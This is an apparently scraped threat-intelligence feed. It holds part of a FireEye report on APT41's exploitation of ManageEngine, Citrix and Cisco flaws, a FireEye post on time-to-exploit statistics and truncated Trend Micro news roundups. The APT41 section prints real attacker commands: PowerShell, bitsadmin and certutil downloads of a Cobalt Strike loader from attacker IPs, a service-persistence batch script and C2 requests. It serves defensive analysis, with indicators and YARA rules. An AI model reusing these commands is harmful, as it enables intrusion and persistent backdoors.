In the first variation the CVE-2020-10189 exploit was used to directly upload \u201clogger.zip\u201d, a simple Java-based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.\n\njava/lang/Runtime\n\ngetRuntime\n\n()Ljava/lang/Runtime;\n\nXcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\\ \nWindows\\Temp\\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll',' \nC:\\Windows\\Temp\\storesyncsvc.dll')&C:\\Windows\\Temp\\install.bat\n\n'(Ljava/lang/String;)Ljava/lang/Process;\n\nStackMapTable\n\nysoserial/Pwner76328858520609\n\nLysoserial/Pwner76328858520609; \n \n--- \n \nFigure 6: Contents of logger.zip\n\nHere we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.\n\nIn the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.\n\nParent Process: C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe\n\nProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\\Users\\Public\\install.bat \n \n--- \n \nFigure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation\n\nIn both variations, the install.bat batch file was used to install persistence for a trial-version Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).\n\n@echo off\n\nset \"WORK_DIR=C:\\Windows\\System32\"\n\nset \"DLL_NAME=storesyncsvc.dll\"\n\nset 
\"SERVICE_NAME=StorSyncSvc\"\n\nset \"DISPLAY_NAME=Storage Sync Service\"\n\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly.\"\n\nsc stop %SERVICE_NAME%\n\nsc delete %SERVICE_NAME%\n\nmkdir %WORK_DIR%\n\ncopy \"%~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SERVICE_NAME%\" /f\n\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\"\n\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\n\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPAND_SZ /d \"%WORK_DIR%\\%DLL_NAME%\" /f\n\nnet start \"%SERVICE_NAME%\" \n \n--- \n \nFigure 8: Contents of install.bat\n\nStoresyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.\n\nGET /jquery-3.3.1.min.js HTTP/1.1 \nHost: cdn.bootcss.com \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nReferer: http://cdn.bootcss.com/ \nAccept-Encoding: gzip, deflate \nCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM \nDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko \nConnection: Keep-Alive Cache-Control: no-cache \n \n--- \n \nFigure 9: 
Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request\n\nWithin a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address. The download used Microsoft CertUtil, a common TTP that we\u2019ve observed APT41 use in past intrusions, to retrieve 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we\u2019ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.\n\nGET /2.exe HTTP/1.1 \nCache-Control: no-cache \nConnection: Keep-Alive \nPragma: no-cache \nAccept: */* \nUser-Agent: Microsoft-CryptoAPI/6.3 \nHost: 91.208.184[.]78 \n \n--- \n \nFigure 10: Example HTTP request downloading \u20182.exe\u2019 VMProtected Meterpreter downloader via CertUtil\n\ncertutil -urlcache -split -f http://91.208.184[.]78/2.exe \n \n--- \n \nFigure 11: Example CertUtil command to download \u20182.exe\u2019 VMProtected Meterpreter downloader\n\nThe Meterpreter downloader \u2018TzGG\u2019 was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).\n\nGET /TzGG HTTP/1.1 \nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) \nHost: 91.208.184[.]78:443 \nConnection: Keep-Alive \nCache-Control: no-cache \n \n--- \n \nFigure 12: Example HTTP request downloading \u2018TzGG\u2019 shellcode for Cobalt Strike BEACON\n\nThe downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. 
We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.\n\nManageEngine released a short-term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long-term fix.\n\n#### Outlook\n\nThis activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41.\n\nIt is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full-featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity shows how resourceful this group is and how quickly it can leverage newly disclosed vulnerabilities to its advantage.\n\nPreviously, FireEye Mandiant Managed Defense identified APT41 successfully leveraging CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. 
While APT41 is a [unique](<https://content.fireeye.com/apt-41/rpt-apt41/>) state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.\n\n#### Indicators\n\n| Type | Indicator(s) |\n|---|---|\n| CVE-2019-19781 Exploitation (Citrix Application Delivery Control) | 66.42.98[.]220 |\n| | CVE-2019-19781 exploitation attempts with a payload of \u2018file /bin/pwd\u2019 |\n| | CVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019 |\n| | CVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un\u2019 |\n| | /tmp/bsd |\n| | /tmp/un |\n| Cisco Router Exploitation | 66.42.98\\\\.220 |\n| | \u20181.txt\u2019 (MD5: c0c467c8e9b2046d7053642cc9bdd57d) |\n| | \u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc) |\n| CVE-2020-10189 (Zoho ManageEngine Desktop Central) | 66.42.98[.]220 |\n| | 91.208.184[.]78 |\n| | 74.82.201[.]8 |\n| | exchange.dumb1[.]com |\n| | install.bat (MD5: 7966c2c546b71e800397a67f942858d0) |\n| | storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f) |\n| | C:\\Windows\\Temp\\storesyncsvc.dll |\n| | C:\\Windows\\Temp\\install.bat |\n| | 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c) |\n| | C:\\Users\\\\[redacted]\\install.bat |\n| | TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9) |\n| | C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe spawning cmd.exe and/or bitsadmin.exe |\n| | Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78 |\n| | PowerShell downloading files with Net.WebClient |\n\n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. 
This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.\n\n| Platform | Signature Name |\n|---|---|\n| Endpoint Security | BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY) |\n| | CERTUTIL.EXE DOWNLOADER A (UTILITY) |\n| | Generic.mg.5909983db4d9023e |\n| | Generic.mg.3e856162c36b5329 |\n| | POWERSHELL DOWNLOADER (METHODOLOGY) |\n| | SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY) |\n| | SAMWELL (BACKDOOR) |\n| | SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT) |\n| Network Security | Backdoor.Meterpreter |\n| | DTI.Callback |\n| | Exploit.CitrixNetScaler |\n| | Trojan.METASTAGE |\n| | Exploit.ZohoManageEngine.CVE-2020-10198.Pwner |\n| | Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader |\n| Helix | CITRIX ADC [Suspicious Commands] |\n| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] |\n| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] |\n| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] |\n| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] |\n| | MALWARE METHODOLOGY [Certutil User-Agent] |\n| | WINDOWS METHODOLOGY [BITSadmin Transfer] |\n| | WINDOWS METHODOLOGY [Certutil Downloader] |\n\n#### MITRE ATT&CK Technique Mapping\n\n| ATT&CK | Techniques |\n|---|---|\n| Initial Access | External Remote Services (T1133), Exploit Public-Facing Application (T1190) |\n| Execution | PowerShell (T1086), Scripting (T1064) |\n| Persistence | New Service (T1050) |\n| Privilege Escalation | Exploitation for Privilege Escalation (T1068) |\n| Defense Evasion | BITS Jobs (T1197), Process Injection (T1055) |\n| Command And Control | Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) |\n\n#### Appendix A: Discovery Rules\n\nThe following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary 
methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Others are broad in aperture and build larger haystacks for further automation or processing in threat hunting systems.\n\nimport \"pe\"\n\nrule ExportEngine_APT41_Loader_String\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll\"\n\nstrings:\n\n$pcre = /loader_[\\x00-\\x7F]{1,}\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_ShortName\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a single character\"\n\nstrings:\n\n$pcre = /[A-Za-z0-9]{1}\\\\.(dll|exe|dat|bin|sys)/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_xArch\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is something like x32.dat\"\n\nstrings:\n\n$pcre = /[\\x00-\\x7F]{1,}x(32|64|86)\\\\.dat\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule RareEquities_LibTomCrypt\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for executables with strings from 
LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples.\"\n\nstrings:\n\n$a1 = \"LibTomMath\"\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1\n\n}\n\nrule RareEquities_KCP\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability.\"\n\nstrings:\n\n$a01 = \"[RO] %ld bytes\"\n\n$a02 = \"recv sn=%lu\"\n\n$a03 = \"[RI] %d bytes\"\n\n$a04 = \"input ack: sn=%lu rtt=%ld rto=%ld\"\n\n$a05 = \"input psh: sn=%lu ts=%lu\"\n\n$a06 = \"input probe\"\n\n$a07 = \"input wins: %lu\"\n\n$a08 = \"rcv_nxt=%lu\\\\\\n\"\n\n$a09 = \"snd(buf=%d, queue=%d)\\\\\\n\"\n\n$a10 = \"rcv(buf=%d, queue=%d)\\\\\\n\"\n\n$a11 = \"rcvbuf\"\n\ncondition:\n\n(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)\n\n}\n\nrule ConventionEngine_Term_Users\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"09e4e6fa85b802c46bc121fcaecc5666\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Users[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Term_Desktop\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"71cdba3859ca8bd03c1e996a790c04f9\"\n\nref_blog = 
\"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Desktop[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Anomaly_MultiPDB_Double\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"013f3bde3f1022b6cf3f2e541d19353c\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2\n\n} \n \n---\n", "modified": "2020-03-25T12:00:00", "published": "2020-03-25T12:00:00", "id": "FIREEYE:BFB36D22F20651C632D25AA20588E904", "href": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "type": "fireeye", "title": "This Is\u00a0Not a Test: APT41 Initiates Global Intrusion Campaign Using\nMultiple Exploits", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T01:38:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, 
employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\n \nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 and Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\n \nFigure 2: Time between vulnerability exploitation and patch issuance\n\n_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. 
This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n| **Time to Exploit for Vulnerabilities First Exploited after a Patch** | |\n|---|---|\n| Hours | Two vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. |\n| Days | 12 percent of vulnerabilities were exploited within the first week following the patch release. |\n| One Month | 15 percent of vulnerabilities were exploited after one week but within one month of patch release. |\n| Years | In multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. |
 \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\n \nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\n \nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\n \nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. 
Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using it within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of PoC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that PoC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or PoC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n| **Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events** | **Product** | **CVE** | **FireEye Risk Rating** |\n|---|---|---|---|\n| 1 day | WinRAR | CVE-2018-20250 | Medium |\n| 1 day | Drupal | CVE-2018-7600 | High |\n| 1 day | Cisco Adaptive Security Appliance | CVE-2018-0296 | Medium |\n| 2 days | Apache Struts | CVE-2018-11776 | High |\n| 2 days | Cisco Adaptive Security Appliance | CVE-2018-0101 | High |\n| 2 days | Oracle WebLogic Server | CVE-2018-2893 | High |\n| 2 days | Microsoft Windows Server | CVE-2018-8440 | Medium |\n| 2 days | Drupal | CVE-2019-6340 | Medium |\n| 2 days | Atlassian Confluence | CVE-2019-3396 | High |\n\nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious 
actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\n \nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. 
In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment. Doing so may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-13T12:00:00", "published": "2020-04-13T12:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability\nExploitation \u2014 Intelligence for Vulnerability Management, Part Two", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-3396"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. 
This week, learn how credit card skimming attacks can impact businesses and how ransomware can use software installations to help hide malicious activities.\n\nRead on:\n\n**[Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>)**\n\n_Trend Micro uncovered recent activity by hacking group Mirrorthief involving the notorious online credit card skimming attack known as Magecart, which impacted 201 online campus stores in the United States and Canada._\n\n**[Hackers Steal $40.7 Million in Bitcoin from Crypto Exchange Binance](<https://www.coindesk.com/hackers-steal-40-7-million-in-bitcoin-from-crypto-exchange-binance>)**\n\n_Hackers stole more than 7,000 bitcoin from crypto exchange Binance and were able to access user API keys, two-factor authentication codes and other information to withdraw $41 million in bitcoin from the exchange._\n\n**[Cyberattack Cripples Baltimore's Government Computer Servers](<https://abcnews.go.com/US/wireStory/cyberattack-cripples-baltimores-government-computer-servers-62888773>)**\n\n_Baltimore's government rushed to shut down most of its computer servers after its network was hit by a ransomware virus, though officials believe it has not touched critical public safety systems. 
_\n\n**[Dharma Ransomware Uses AV Tool to Distract from Malicious Activities](<https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/>)**\n\n_Trend Micro recently found new samples of Dharma ransomware that are using a new technique: using software installation as a distraction to help hide malicious activities._\n\n**[What Israel\u2019s Strike on Hamas Hackers Means for Cyberwar](<https://www.wired.com/story/israel-hamas-cyberattack-air-strike-cyberwar/>)**\n\n_The Israeli Defense Force claimed that it bombed and partially destroyed one building in Gaza because it was allegedly the base of an active Hamas hacking group._\n\n**[CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner with Rootkit](<https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/>)**\n\n_Trend Micro observed a critical vulnerability involving Confluence that was being exploited by threat actors to perform malicious attacks._\n\n**[Trump Creates New Cybersecurity Competition with a $25,000 Award](<https://www.rollcall.com/news/congress/trump-creates-new-cybersecurity-competition-with-a-25000-award>)**\n\n_The Trump administration announced steps to address a shortage of cybersecurity workers across the federal government, including sponsorship of a national competition and allowing cyber experts to rotate from one agency to another._\n\nWhat are your thoughts on hacking groups like Mirrorthief and their impact on businesses and consumers? 
Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay](<https://twitter.com/jonlclay>).\n\nThe post [This Week in Security News: Skimming Attacks and Ransomware](<https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-10T13:00:42", "published": "2019-05-10T13:00:42", "id": "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "href": "https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/", "type": "trendmicroblog", "title": "This Week in Security News: Skimming Attacks and Ransomware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-3396"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the prevalence and impact of BEC attacks. 
Also, find out how botnet malware can perform remote code execution, DDoS attacks and cryptocurrency mining.\n\nRead on:\n\n**[Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers](<https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/>)**\n\n_Trend Micro discovered a new technical support scam (TSS) campaign that makes use of an iframe in combination with basic pop-up authentication to freeze a user\u2019s browser._\n\n**[Cybersecurity Pros Could Work for Multiple Agencies Under Bill Passed by Senate](<https://www.fedscoop.com/federal-rotational-cyber-workforce-program-passes-senate/>)**\n\n_Skilled federal cybersecurity workers could be rotated among civilian agencies under bipartisan legislation the Senate passed to help fill specific gaps in the workforce._\n\n**[New Cybersecurity Report Warns CIOs -- 'If You're Breached Or Hacked, It's Your Own Fault'](<https://www.forbes.com/sites/zakdoffman/2019/05/02/new-cybersecurity-report-warns-cios-if-youre-breached-or-hacked-its-your-own-fault/#79878146fe08>)**\n\n_A new [cybersecurity survey](<https://www.1e.com/getting-your-house-in-order/>) conducted by endpoint management specialists [1E](<https://www.1e.com/>) and 